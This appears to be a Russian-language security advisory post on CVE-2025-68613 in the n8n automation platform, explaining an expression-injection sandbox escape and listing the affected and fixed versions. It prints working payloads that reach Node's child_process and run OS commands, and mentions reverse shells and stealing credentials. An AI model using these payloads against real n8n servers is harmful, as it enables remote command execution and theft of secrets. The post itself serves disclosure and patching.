n8n Expression Injection → RCE (CVE‑2025‑68613)

В конце прошлого года были опубликованы технические детали эксплуатации критической уязвимости CVE‑2025‑68613 с оценкой CVSSv3 = 9.9 в популярной open‑source платформе автоматизации n8n
n8n - workflow‑движок на Node.js, широко используемый для автоматизации LLM интеграций. У меня n8n используется для домашней автоматизации в качестве альтернативы Node-Red для Home Assistant, но также достаточно часто разворачивается внутри корпоративных сетей, что делает последствия эксплуатации довольно критичными.

В n8n используется механизм expressions - любые значения в формате {{ ... }} интерпретируются как JavaScript и обрабатываются на стороне сервера как есть🤷

Проблема в том, что:
🔴 expression evaluator не имеет строгой sandbox‑изоляции;
🔴 возможен доступ к prototype chain;
🔴 выражения исполняются через небезопасные конструкции уровня Function().
В результате expression injection позволяет выйти из песочницы и получить доступ к runtime Node.js

POC демонстрирующий побег из sandbox:
{{ this.constructor.constructor("return process")() }}

this.constructor → Function
Function.constructor → снова Function
создаётся новая функция, возвращающая process

Дальше всё предсказуемо - получаем child_process и выполняем команды ОС:
{{
this.constructor
.constructor(
"return process.mainModule.require('child_process')" +
".execSync('id').toString()"
)()
}}

Таким образом имея непривилегированную учётку n8n, атакующий может:
✔️ прокинуть себе reverse shell
✔️ украсть токены, секреты и креды из workflow
✔️ модифицировать или подменить бизнес‑логику автоматизации

⚙️ POC: https://github.com/TheStingR/CVE-2025-68613-POC
🔎 Nuclei: https://github.com/rxerium/CVE-2025-68613/blob/main/CVE-2025-68613.yaml
🪲 Уязвимые версии ПО: 0.211.0 – 1.120.3
✅ Рекомендации: Обновиться до версии 1.120.4 / 1.121.1 / 1.122.0